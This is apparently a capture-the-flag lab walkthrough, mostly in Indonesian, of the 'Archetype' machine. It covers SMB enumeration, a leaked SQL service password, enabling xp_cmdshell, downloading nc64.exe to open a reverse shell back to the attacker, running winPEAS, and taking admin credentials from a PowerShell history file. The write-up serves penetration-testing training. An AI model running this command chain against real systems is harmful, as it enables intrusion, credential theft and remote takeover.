Skip to content

Archetype

#smbclient #ms-sql-server #impacket

nmap -sV -sC <ip_target>

Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-24 15:37 WIB
Nmap scan report for 10.129.106.221
Host is up (0.37s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT      STATE    SERVICE       VERSION
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds  Windows Server 2019 Standard 17763 microsoft-ds
1078/tcp  filtered avocent-proxy
1433/tcp  open     ms-sql-s      Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
|   Target_Name: ARCHETYPE
|   NetBIOS_Domain_Name: ARCHETYPE
|   NetBIOS_Computer_Name: ARCHETYPE
|   DNS_Domain_Name: Archetype
|   DNS_Computer_Name: Archetype
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-01-24T01:47:56
|_Not valid after:  2052-01-24T01:47:56
|_ssl-date: 2022-01-24T01:50:29+00:00; -6h48m24s from scanner time.
10012/tcp filtered unknown
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2022-01-24T01:50:12
|_  start_date: N/A
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-01-23T17:50:14-08:00
| ms-sql-info:
|   10.129.106.221:1433:
|     Version:
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_clock-skew: mean: -5h12m23s, deviation: 3h34m41s, median: -6h48m24s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.05 seconds

Port SMB terbuka dan juga Microsoft SQL Server 2017.

  1. Enumerate SMB dengan smbclient
smbclient -N -L \\\\<ip_target>

-N : No password
-L : This option allows you to look at what services are available on a server

Akses yang dapat dienumerate backups

smbclient -N \\\\<ip_target>\\backups

smb: \> dir
smb: \> get prod.dtsConfig

cat prod.dtsConfig

<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>

Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc

  1. Enumerate MS-SQL-Server

Impacket tool includes a valueable python script called mssqlclient.py which offers such a functionality.
Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch, as well as parsed from raw data, and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.

https://github.com/SecureAuthCorp/impacket

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip3 install .
# OR:
sudo python3 setup.py install
# In case you are missing some modules:
pip3 install -r requirements.txt

semua file yang akan digunakan diambil dari folder impacket

python3 mssqlclient.py -h
python3 mssqlclient.py ARCHETYPE/sql_svc@{TARGET_IP} -windows-auth

SQL> help

https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server
https://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet

cek role yang kita miliki di dalam server

SQL> SELECT is_srvrolemember('sysadmin');

cek aktivasi xp_cmdshell, karena biasanya disable by default

SQL> EXEC xp_cmdshell 'net user';

mengaktifkan xp_cmdshell

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
sp_configure; - Enabling the sp_configure as stated in the above error message
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

cek

SQL> xp_cmdshell "whoami"
  1. Reverse Shell

konsep

1. upload nc64.exe ke server
2. eksekusi cmd.exe di listener

http server (local) -> server -> listener (local)

nc64.exe

buka terminal

sudo python3 -m http.server 80

new terminal tab

sudo nc -lvnp 443

akan menggunakan powershell karena fiturnya lebih banyak, sehingga powershell -c command tiap eksekusi

SQL> xp_cmdshell "powershell -c pwd"

flag user

C:\Users\sql_svc\Desktop

menempatkan pada directory yang memungkinkan user biasa write

SQL> xp_cmdshell "powershell -c dir C:\Users"

SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://<ip_local>/nc64.exe -outfile nc64.exe"

*jangan lupa untuk allow port 80 pada local (linux ufw):

sudo ufw allow 80

bind cmd.exe ke listener local

SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe <ip_local> 443"
  1. Previlege Escalation

Windows Previleges Escalation, tools winPeas

kirim ke target mesin

powershell
wget http://10.10.14.9/winPEASx64.exe -outfile winPEASx64.exe

run

PS C:\Users\sql_svc\Downloads> .\winPEASx64.exe

buka listener

cd C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\
type ConsoleHost_history.txt

diperoleh user dan password dari admin

buka terminal baru

python3 psexec.py administrator@{TARGET_IP}

flag root

C:\Users\Administrator\Desktop